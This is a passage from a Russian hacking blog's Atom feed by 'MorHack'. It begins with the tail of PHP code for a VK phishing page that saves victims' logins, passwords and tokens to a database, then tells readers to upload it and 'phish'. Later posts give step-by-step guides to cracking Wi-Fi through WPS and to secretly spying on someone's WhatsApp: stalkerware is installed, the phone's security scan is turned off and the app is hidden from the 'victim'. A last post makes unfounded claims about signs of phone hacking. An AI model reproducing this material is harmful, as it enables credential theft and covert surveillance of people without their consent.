  &lt;p&gt;//Подключаемся к БД&lt;/p&gt;
  &lt;p&gt;$host=&amp;quot;localhost&amp;quot;;&lt;/p&gt;
  &lt;p&gt;$user=&amp;quot;&amp;quot;; //Имя пользователя от MySql&lt;/p&gt;
  &lt;p&gt;$pass=&amp;quot;&amp;quot;; //Пароль от MySql&lt;/p&gt;
  &lt;p&gt;$db_name=&amp;quot;&amp;quot;; //Имя базы&lt;/p&gt;
  &lt;p&gt;$link=mysql_connect($host,$user,$pass);&lt;/p&gt;
  &lt;p&gt;mysql_select_db($db_name,$link);&lt;/p&gt;
  &lt;p&gt;mysql_query(&amp;quot;set names utf8&amp;quot;);&lt;/p&gt;
  &lt;p&gt;//Выполняем запись валида в БД&lt;/p&gt;
  &lt;p&gt;$sql = mysql_query(&amp;quot;INSERT INTO vk(login, password, token, &lt;br /&gt;date, user_id, first_name, last_name) VALUES(&amp;#x27;&amp;quot;.$login.&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.&lt;br /&gt;$password.&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.$token[0].&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.$date_l.&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.&lt;br /&gt;$token1[&amp;#x27;user_id&amp;#x27;].&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.$data[&amp;#x27;response&amp;#x27;][0]&lt;br /&gt;[&amp;#x27;first_name&amp;#x27;].&amp;quot;&amp;#x27;,&amp;#x27;&amp;quot;.$data[&amp;#x27;response&amp;#x27;][0][&amp;#x27;last_name&amp;#x27;].&amp;quot;&amp;#x27;)&amp;quot;);&lt;/p&gt;
  &lt;p&gt;//Если все прошло успешно, то перенаправляем пользователя на &lt;br /&gt;vk.com или на ваш сайт&lt;/p&gt;
  &lt;p&gt;if ($sql) {&lt;/p&gt;
  &lt;p&gt;session_start();&lt;/p&gt;
  &lt;p&gt;$_SESSION[&amp;#x27;logged_user&amp;#x27;] = $data[&amp;#x27;response&amp;#x27;][0]&lt;br /&gt;[&amp;#x27;first_name&amp;#x27;];&lt;/p&gt;
  &lt;p&gt;header(&amp;#x27;Location: vk.com/&amp;#x27;);&lt;/p&gt;
  &lt;p&gt;//Если при записи обнаружены ошибки, то перенаправим &lt;br /&gt;пользователя на главную страницу нашего сайта с сообщением об &lt;br /&gt;ошибке&lt;/p&gt;
  &lt;p&gt;} else header(&amp;#x27;Location: /authorize.php?error_login=true&amp;#x27;);&lt;/p&gt;
  &lt;p&gt;//Закрываем соединение&lt;/p&gt;
  &lt;p&gt;mysql_close($link);&lt;/p&gt;
  &lt;p&gt;exit;&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;//Если авторизация не прошла, то отправим пользователя на &lt;br /&gt;стартовую страницу с ошибкой&lt;/p&gt;
  &lt;p&gt;else header(&amp;#x27;Location: /authorize.php?error_login=true&amp;#x27;);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;//cUrl POST&lt;/p&gt;
  &lt;p&gt;function post($url = null, $params = null, $proxy = null, &lt;br /&gt;$proxy_userpwd = null) {&lt;/p&gt;
  &lt;p&gt;$ch = curl_init();&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_URL, $url);&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_HEADER, 1);&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);&lt;/p&gt;
  &lt;p&gt;if(isset($params[&amp;#x27;params&amp;#x27;])) {&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_POST, 1);&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_POSTFIELDS, $params[&amp;#x27;params&amp;#x27;]);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;if(isset($params[&amp;#x27;headers&amp;#x27;])) {&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_HTTPHEADER, $params[&amp;#x27;headers&amp;#x27;]);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;if(isset($params[&amp;#x27;cookies&amp;#x27;])) {&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_COOKIE, $params[&amp;#x27;cookies&amp;#x27;]);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;if($proxy) {&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_PROXY, $proxy);&lt;/p&gt;
  &lt;p&gt;if($proxy_userpwd) {&lt;/p&gt;
  &lt;p&gt;curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;$result = curl_exec($ch);&lt;/p&gt;
  &lt;p&gt;$result_explode = explode(&amp;quot;\r\n\r\n&amp;quot;, $result);&lt;/p&gt;
  &lt;p&gt;$headers = ((isset($result_explode[0])) ? &lt;br /&gt;$result_explode[0].&amp;quot;\r\n&amp;quot; : &amp;#x27;&amp;#x27;).&amp;#x27;&amp;#x27;.&lt;br /&gt;((isset($result_explode[1])) ? $result_explode[1] : &amp;#x27;&amp;#x27;);&lt;/p&gt;
  &lt;p&gt;$content = $result_explode[count($result_explode) - 1];&lt;/p&gt;
  &lt;p&gt;preg_match_all(&amp;#x27;|Set-Cookie: (.*);|U&amp;#x27;, $headers, &lt;br /&gt;$parse_cookies);&lt;/p&gt;
  &lt;p&gt;$cookies = implode(&amp;#x27;;&amp;#x27;, $parse_cookies[1]);&lt;/p&gt;
  &lt;p&gt;curl_close($ch);&lt;/p&gt;
  &lt;p&gt;return array(&amp;#x27;headers&amp;#x27; =&amp;gt; $headers, &amp;#x27;cookies&amp;#x27; =&amp;gt; $cookies, &lt;br /&gt;&amp;#x27;content&amp;#x27; =&amp;gt; $content);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;?&amp;gt;&lt;/p&gt;
  &lt;p&gt;В переменные $host=&amp;quot;localhost&amp;quot;;&lt;br /&gt;$user=&amp;quot;&amp;quot;; //Имя пользователя от MySql&lt;br /&gt;$pass=&amp;quot;&amp;quot;; //Пароль от MySql&lt;br /&gt;$db_name=&amp;quot;&amp;quot;; //Имя базы&lt;br /&gt;вписываем наши данные&lt;/p&gt;
  &lt;p&gt;На 50 строчке если авторизация прошла успешно, нужно перенаправить &lt;br /&gt;пользователя на ваш сайт или куда вам угодно.&lt;br /&gt;header(&amp;#x27;Location: &amp;quot;Ваш сайт&amp;quot; &amp;#x27;);&lt;br /&gt;Осталось залить все файлы на хостинг и можно фишить.&lt;/p&gt;
  &lt;p&gt;Как всегда, ваш MorHack! Читай мои статьи и прокачивайся!&lt;/p&gt;

</content></entry><entry><id>morhack:aevwdrt8V</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/aevwdrt8V?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Топ-5 программ для взлома Wi-Fi на ANDROID</title><published>2020-10-15T15:02:10.068Z</published><updated>2020-10-15T15:02:10.068Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/d5/9f/d59f6c7f-05e0-4c95-b814-ce8b23ac2fc6.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/f0/d5/f0d54ec3-61aa-452b-801c-adac9b586236.png&quot;&gt;MorHack на связи!</summary><content type="html">
  &lt;p&gt;MorHack на связи!&lt;/p&gt;
  &lt;p&gt;Существует несколько способов получения доступа к беспроводной сети, даже если данные для входа полностью отсутствуют, а мобильное устройство никогда к ней не подключалось. &lt;strong&gt;Одни программы всего лишь используют последовательный подбор ключей, другие же пытаются найти пароль через смартфоны ближайших пользователей.&lt;/strong&gt; Так или иначе, следующие утилиты прекрасно справляются с возложенной на них задачей.&lt;/p&gt;
  &lt;h2&gt;WPS Connect&lt;/h2&gt;
  &lt;p&gt;К сожалению, данная программа &lt;strong&gt;работает только с сетями, защищенными по стандарту WPS (Wi-Fi Protected Setup).&lt;/strong&gt; Скачав ее с Google Play, выполните следующую последовательность действий для проверки работоспособности взлома:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Выполните запуск утилиты, нажав на соответствующую иконку.&lt;/li&gt;
    &lt;li&gt;Нажмите на кнопку в правом верхнем углу, чтобы обновить список видимых сетей.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/f0/d5/f0d54ec3-61aa-452b-801c-adac9b586236.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Выберите нужную точку Wi-Fi и проверьте доступные для нее пароли.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/d6/05/d605b2c0-b595-41a2-9ca4-5b8edd83b50d.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;После того как необходимый код будет найден, произведите подключение.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;WIFI WPS WPA TESTER&lt;/h2&gt;
  &lt;p&gt;Как и в случае с предыдущим приложением, &lt;strong&gt;взаимодействие осуществляется только с протоколом WPS.&lt;/strong&gt; Для взлома выполните следующие действия:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Скачав программу на свое мобильное устройство, откройте ее.&lt;/li&gt;
    &lt;li&gt;Перейдите к перечню доступных точек Wi-Fi при помощи кнопки обновления информации.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/30/d3/30d327b4-f66a-4c04-b5bd-bf79bace92e0.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Выберите одну из беспроводных сетей, отмеченных значком в виде зеленого замка.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1a/20/1a20cb5f-fa0b-40c6-90a9-dcb7b5963d52.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Проверьте все предложенные коды в ручном или автоматическом режиме.&lt;/li&gt;
    &lt;li&gt;Выполните подключение к разблокированному таким образом Wi-Fi.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;AndroDumpper WiFi&lt;/h2&gt;
  &lt;p&gt;Чтобы разблокировать точку Wi-Fi при помощи этой программы, &lt;strong&gt;обязательно потребуется получить права администратора на мобильном устройстве.&lt;/strong&gt; Для работы с утилитой воспользуйтесь следующим руководством:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Запустите приложение на смартфоне с ОС Android.&lt;/li&gt;
    &lt;li&gt;Найдите нужную беспроводную сеть и нажмите на кнопку «Try Connect».&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/b8/33/b8336e91-2943-44a2-8b6d-ed1ffd30d5d3.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Далее необходимо выбрать вариант «NO CUSTOM PIN».&lt;/li&gt;
    &lt;li&gt;Через некоторое время подбор пароля будет завершен и произойдет подключение.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;WiFi Master Key&lt;/h2&gt;
  &lt;p&gt;Данная утилита не осуществляет взлом Wi-Fi на ОС Android в привычном понимании этого действия, а скорее просто &lt;strong&gt;собирает общеизвестные ключи от беспроводных сетей, находящихся поблизости.&lt;/strong&gt; Чтобы применить на практике функционал программы, ознакомьтесь с нижеописанной пошаговой инструкцией:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Откройте мобильное приложение на своем устройстве.&lt;/li&gt;
    &lt;li&gt;Нажмите на появившуюся в центре экрана кнопку «Поиск Wi-Fi ключа».&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/08/04/0804223b-6da0-4851-b625-4dfc9f1bea5f.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul&gt;
    &lt;li&gt;Выберите одну из доступных точек Wi-Fi, обозначенных голубым ключом.&lt;/li&gt;
    &lt;li&gt;Проверьте успешность подключения к беспроводной сети.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;Wi-Fi You&lt;/h2&gt;
  &lt;p&gt;По своему принципу работы эта небольшая&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;утилита похожа на предыдущий способ получения доступа к Wi-Fi.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для ее правильного использования достаточно выполнить следующие шаги:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Произведите запуск программы, предварительно &lt;a href=&quot;https://mobila.guru/faqsingle/ustanovka-prilozhenij-na-android/&quot; target=&quot;_blank&quot;&gt;загрузив ее в память смартфона&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Активируйте встроенную функцию поиска беспроводных сетей.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/d2/fa/d2fa29e0-8a49-48f0-b1dc-1ff43f5a204c.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Выберите наиболее подходящую точку Wi-Fi и подключитесь к ней.&lt;/p&gt;
  &lt;p&gt;Стоит заметить, что универсального способа, позволяющего получить доступ к любой сети, в данное время не существует. Имеющиеся сегодня программы используют разные методы подбора паролей, однако&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;зачастую их действие рассчитано на поиск крайне очевидных уязвимостей в защите.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Таким образом, разблокировать Wi-Fi, владелец которого заботится о своей безопасности, будет очень непросто. Воспользовавшись вышеописанными программами, вы сможете получить базовое представление о том, как взломать Вай-Фай с ОС Android.&lt;/p&gt;
  &lt;p&gt;Ну и с Вами был MorHack, не прощаемся!&lt;/p&gt;

</content></entry><entry><id>morhack:PNhW5OiB1</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/PNhW5OiB1?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Взлом WhatsApp</title><published>2020-10-15T14:57:02.796Z</published><updated>2020-10-15T14:57:24.616Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/16/94/1694bf94-d0d6-430a-95b2-7965fc857fe5.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/e4/1d/e41d416b-eea4-4fc7-9841-c33ba9a5ddcd.png&quot;&gt;Привет, мои хакерята! MorHack на связи.</summary><content type="html">
  &lt;p&gt;Привет, мои хакерята! MorHack на связи.&lt;/p&gt;
  &lt;p&gt;Взлом WhatsApp не происходит спонтанно или мгновенно, это требует достаточно много усилий, терпения и определенных познаний. Суть данной статьи заключается в том, чтобы дать вам несколько советов и подсказок о том, как можно шпионить за сообщениями в WhatsApp.Существует немалое количество способов следить за сообщениями в WhatsApp ваших знакомых без их ведома.&lt;/p&gt;
  &lt;blockquote&gt;&lt;em&gt;Эта статья написана только для образовательных целей. Автор (MorHack), не публиковал эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор не несет ответственность за любой причиненный вред или ущерб.&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p&gt;Существуют разные причины, по которым вам потребовалось следить за чужими сообщениями в WhatsApp. К примеру, вы родитель, и вам необходимо следить за активностью ваших детей в данном мессенджере. Нижеприведенные инструменты слежки помогут вам справиться с подобной задачей на ура.&lt;/p&gt;
  &lt;p&gt;Некоторые способы слежки вручную за сообщениями в WhatsApp весьма рискованные, вы можете нажить себе немало проблем. Использование инструментов, которые освещены в данной статье, поможет вам избежать проблемных ситуаций.&lt;/p&gt;
  &lt;h3&gt;Как следить за сообщениями в WhatsApp&lt;/h3&gt;
  &lt;h3&gt;Метод 1: Слежка за сообщениями без сканирования QR-кода&lt;/h3&gt;
  &lt;p&gt;Данный метод очень надежен, если вы собрались следить за чужими сообщениями в WhatsApp. Не сработает в том случае, если WhatsApp заблокирован.Для реализации этого метода вам нужно остаться с телефоном жертвы на пару минут и установить шпионское ПО. Весь процесс займет менее двух минут вашего времени. Так что хватит сотрясать воздух и давайте перейдем к делу.&lt;/p&gt;
  &lt;p&gt;Шаг 1: Вам понадобится устройство цели всего лишь на пару минут. Так что сразу после того, как устройство оказалось у вас в руках – не медлите – устанавливайте приложение.Ссылка на скачивание предоставлена ниже, не забудьте проверить ее перед мероприятием. А также убедитесь, что имеется исправное Интернет-соединение.&lt;/p&gt;
  &lt;p&gt;https://www.spy-phone-app.com/m/custom_install&lt;/p&gt;
  &lt;p&gt;Устанавливаем приложение.&lt;/p&gt;
  &lt;p&gt;ВНИМАНИЕ: Перед тем, как установить приложение на телефон, за которым желаете следить, вам нужно:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Перейти в Settings &amp;gt; Security &amp;gt; поставить галочку напротив Unknown Sources&lt;/li&gt;
    &lt;li&gt;Перейти в Google Settings &amp;gt; Security &amp;gt; Отключить “Scan device for Security Treats”&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Так, как показано ниже: Перейти в Settings &amp;gt; Security &amp;gt; поставить галочку напротив Unknown Sources&lt;/p&gt;
  &lt;p&gt;Перейти в Google Settings &amp;gt; Security &amp;gt; Отключить “Scan device for Security Treats”&lt;/p&gt;
  &lt;p&gt;Шаг 2:После установки открываем наше приложение. Нажимаем «Принять» и регистрируемся через нашу почту и пароль.&lt;/p&gt;
  &lt;p&gt;Шаг 3:После этого передайте все разрешения приложению, активируйте его и нажмите на выход. Приложение автоматически исчезнет с устройства цели. После этого можете спокойно вернуть устройство жертве.&lt;/p&gt;
  &lt;p&gt;Шаг 4:Теперь откройте эту ссылку на своем устройстве. Для этого зайдите, используя вашу электронную почту и пароль, нажмите на ваше устройство и выберите WhatsApp из списка.&lt;/p&gt;
  &lt;p&gt;Теперь каждое сообщение с телефона цели будет перед вашими глазами.&lt;/p&gt;
  &lt;h3&gt;Метод 2: Слежка в WhatsApp с помощью web.whatsapp.com&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e4/1d/e41d416b-eea4-4fc7-9841-c33ba9a5ddcd.png&quot; width=&quot;794&quot; /&gt;
    &lt;figcaption&gt;&lt;em&gt;MorHack&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Для того, чтобы провернуть данную уловку, вам необязательно быть гением программирования или взлома. Все, что вам нужно, представлено ниже. Требования к слежке в WhatsApp с использованием web.whatsapp.com&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Вам потребуется компьютер с доступом к настольной версии Whatsapp. Можете прочитать специальные статьи об этом.&lt;/li&gt;
    &lt;li&gt;Вам также нужен одноразовый доступ к телефону жертвы (Это не так уж и сложно осуществить)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Что ж, если успешно реализовали два предыдущих пункта, то вы готовы к наиболее интересной части данного взлома.&lt;/p&gt;
  &lt;p&gt;Как с легкостью следить за чужими сообщениями в WhatsApp&lt;/p&gt;
  &lt;p&gt;Следуйте инструкции осторожно, если желаете, чтобы ваши действия остались незамеченными.&lt;/p&gt;
  &lt;p&gt;Шаг 1:Откройте WhatsApp web на компьютере с помощью браузера. Для этого откройте ваш браузер и вставьте https://web.whatsapp.com/ в адресную строку. (Запомните, данная уловка сработает только на тех, кто использует whatsapp web)&lt;/p&gt;
  &lt;p&gt;Шаг 2:Вам понадобится телефон цели всего лишь на пару минут. Возьмите телефон и откройте приложение WhatsApp.&lt;/p&gt;
  &lt;p&gt;Шаг 3:После этого приложение попросит вас отсканировать QR-код с помощью вашего телефона. С помощью телефона вашей цели в данном случае. Для этого откройте WhatsApp на его/ее телефоне.&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;На Android: Экран диалогов &amp;gt; Меню (три точки в правом углу) &amp;gt; Настройки &amp;gt; WhatsApp Web.&lt;/li&gt;
    &lt;li&gt;На iPhone: Настройки &amp;gt; WhatsApp Web&lt;/li&gt;
    &lt;li&gt;На Windows Phone: Меню &amp;gt; Настройки &amp;gt; WhatsApp Web&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Отсканируйте QR-код с экрана вашего компьютера с помощью телефона жертвы.&lt;/p&gt;
  &lt;p&gt;Теперь у вас имеется легкий доступ к чужим сообщениям в WhatsApp без их ведома. Так что данная уловка позволяет вам следить за чужим общением без разрешения.&lt;/p&gt;
  &lt;h3&gt;Метод 3: Слежка в WhatsApp с помощью кейлоггеров&lt;/h3&gt;
  &lt;p&gt;Кейлоггеры позволяют вам следить за нажатием клавиш на устройстве жертвы, и, следовательно, читать чужие переписки.&lt;/p&gt;
  &lt;h3&gt;Слежка в WhatsApp с помощью инструмента iKeyMonitor WhatsApp Spy&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/e9/40/e940f394-93e2-4e4a-8a4e-d804939f5861.png&quot; width=&quot;500&quot; /&gt;
    &lt;figcaption&gt;&lt;em&gt;MorHack&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;iKeyMonitor WhatsApp Spy записывает сообщения цели и отсылает вам результаты в режиме онлайн. Так что вы можете следить за WhatsApp сообщениями цели в реальном времени каждый раз, когда он или она выходят в сеть. Однако, приложение не бесплатно, хоть вам и доступна 7-дневная пробная версия. Для того, чтобы использовать данный инструмент, вам нужно хотя бы раз остаться с телефоном цели наедине. Следуйте инструкциям ниже, чтобы получить доступ к сообщениям WhatsApp и к истории с помощью iKeyMonitor.&lt;/p&gt;
  &lt;p&gt;Шаг 1: Перейдите по ссылке ikeymonitor.com в вашем веб-браузере и выберите пробную версию.&lt;/p&gt;
  &lt;p&gt;Шаг 2: Выберите тип устройства, Yes, I can get device in my hand &amp;gt; зарегистрируйтесь, заполнив все необходимые сведения так, как показано ниже.&lt;/p&gt;
  &lt;p&gt;Шаг 3: После регистрации проверьте вашу электронную почту. Вы получите письмо от ikeymonitor примерно следующего содержания:&lt;/p&gt;
  &lt;p&gt;Шаг 4: Снова откройте окно ikeymonitor и войдите. Подождите пока загрузится панель управления, она выглядит примерно так:&lt;/p&gt;
  &lt;p&gt;Шаг 5: Загрузите и установите приложение ikeymonitor на устройство вашей цели так, как показано на рисунке ниже. Следуйте инструкциям в зависимости от ваших нужд.&lt;/p&gt;
  &lt;p&gt;Шаг 6: После загрузки и установки приложения на устройстве цели вы сможете получать логи в режиме настоящего времени в вашей панели управления. Вы также сможете получать данные и с других приложений.&lt;/p&gt;
  &lt;h3&gt;Слежка в WhatsApp с помощью приложений Spyzie&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a6/f2/a6f23e1e-c34c-4fdf-a392-4956d1c7487f.png&quot; width=&quot;512&quot; /&gt;
    &lt;figcaption&gt;&lt;em&gt;MorHack&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Spyzie – это очередное популярное приложение для слежки в WhatsApp, которое используют родители и прочие люди для того, чтобы мониторить активность их детей в сети. Приложение также, как и iKeyMonitor, имеет функции кейлоггера для записи экрана цели. Для того, чтобы начать использовать Spyzie, вам нужно следовать инструкциям ниже.&lt;/p&gt;
  &lt;p&gt;Шаг 1: Создайте аккаунт на my.spyzie.com&lt;/p&gt;
  &lt;p&gt;Шаг 2: Вы получите письмо подтверждения с необходимыми данными входа.&lt;/p&gt;
  &lt;p&gt;Шаг 3: Установите приложение на устройство цели. Если вы не можете установить, то сперва попробуйте демоверсию.&lt;/p&gt;
  &lt;p&gt;Шаг 4: После успешной установки зайдите в панель управления spyzie, используя данные входа, присланные в электронном письме.&lt;/p&gt;
  &lt;p&gt;Шаг 5: Доступ к функциям кейлоггера осуществляется прямиком из меню панели управления. Подождите, пока ваша цель не зайдет в его/ее WhatsApp, вам придет уведомление на ваше устройство. Теперь вы можете беспрерывно следить за сообщениями цели в WhatsApp. Записи, которые делает кейлоггер, отсылаются вам в режиме онлайн.&lt;/p&gt;
  &lt;h3&gt;Слежка в WhatsApp с помощью MSpy&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/fc/04/fc04e7d4-2147-4b13-b6a4-5d9bbeb4746c.png&quot; width=&quot;600&quot; /&gt;
    &lt;figcaption&gt;&lt;em&gt;MorHack&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;MSpy – это одно из наиболее популярных приложений для слежки в WhatsApp. Оно не бесплатное, но вы можете воспользоваться пробной версией на определенное период.&lt;/p&gt;
  &lt;p&gt;Шаг 1: Перейдите на mspay.com и купите комплектацию приложения по вашему выбору.&lt;/p&gt;
  &lt;p&gt;Шаг 2: Программа отошлет вам письмо подтверждения со всеми необходимыми данными входа.&lt;/p&gt;
  &lt;p&gt;Шаг 3: Просмотрите демоверсию приложения, чтобы понять, как оно работает.&lt;/p&gt;
  &lt;p&gt;Шаг 4: После этого установите приложение на устройство цели, и вы получите доступ к нему из вашей панели управления.&lt;/p&gt;
  &lt;p&gt;Шаг 5: Откройте функции WhatsApp, чтобы просматривать и следить за сообщениями в мессенджере.&lt;/p&gt;
  &lt;p&gt;Шаг 6: Используйте функции кейлоггера, чтобы следить за аккаунтом без ведома жертвы.&lt;/p&gt;
  &lt;p&gt;Бывает информация которую лучше и не знать, так что подумайте, надо ли оно вам.&lt;br /&gt;С вами был &lt;em&gt;MorHack&lt;/em&gt;, не прощаемся!&lt;/p&gt;

</content></entry><entry><id>morhack:rl7lP-0de</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/rl7lP-0de?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>4 признака того, что ваш телефон прослушивают.</title><published>2020-10-15T14:51:46.127Z</published><updated>2020-10-15T14:51:46.127Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/8d/be/8dbe236d-e0db-447e-922b-0d64211605ee.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/68/f4/68f4b1e3-41b2-4eff-909f-9e23731e1e46.png&quot;&gt;Привет, юные хакеры! Сегодня я расскажу о самых популярных признаках взлома вашего телефона. Невнимательный пользователь, на первый взгляд, ничего не обнаружит. Однако, проверьте - возможно, ваш смартфон под угрозой. Поехали!</summary><content type="html">
  &lt;p&gt;Привет, юные хакеры! Сегодня я расскажу о самых популярных признаках взлома вашего телефона. Невнимательный пользователь, на первый взгляд, ничего не обнаружит. Однако, проверьте - возможно, ваш смартфон под угрозой. Поехали!&lt;/p&gt;
  &lt;h3&gt;1. В телефоне установлены &amp;quot;не удаляемые&amp;quot; приложения.&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/68/f4/68f4b1e3-41b2-4eff-909f-9e23731e1e46.png&quot; width=&quot;1024&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Выглядит это следующим образом : вы листаете меню и видите приложение, которое раньше не стояло. Пытаетесь удалить, а не выходит - либо после удаления, оно остается, либо просто не удается его удалить.&lt;/p&gt;
  &lt;p&gt;Тут пригодятся руки мастера, однако, спешу вас обрадовать - в большинстве случаев достаточно удалить последнее установленное приложение и все проходит.&lt;/p&gt;
  &lt;p&gt;Проверено лично!&lt;/p&gt;
  &lt;h3&gt;2. Телефон внезапно стал сильно греться.&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/ab/17/ab1726d1-0a69-4a1c-ac23-394882a74d26.png&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Однако, если вы это заметили относительно недавно - все же, стоит задуматься. Это может быть первым звоночком того, что вы не одни знаете, что у вас в телефоне!&lt;/p&gt;
  &lt;h3&gt;3. Батарея плохо держит.&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/fd/f0/fdf069b4-589b-492f-8342-f83f3b825d9a.png&quot; width=&quot;669&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3&gt;4. Смартфон сильно тормозит.&lt;/h3&gt;
  &lt;p&gt;Спасти его можно как обычно - удалив последнее приложение, либо сделав сброс до заводских настроек.&lt;/p&gt;
  &lt;p&gt;Это, считайте, 95% вероятность, как минимум, слежки за вашим смартфоном.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
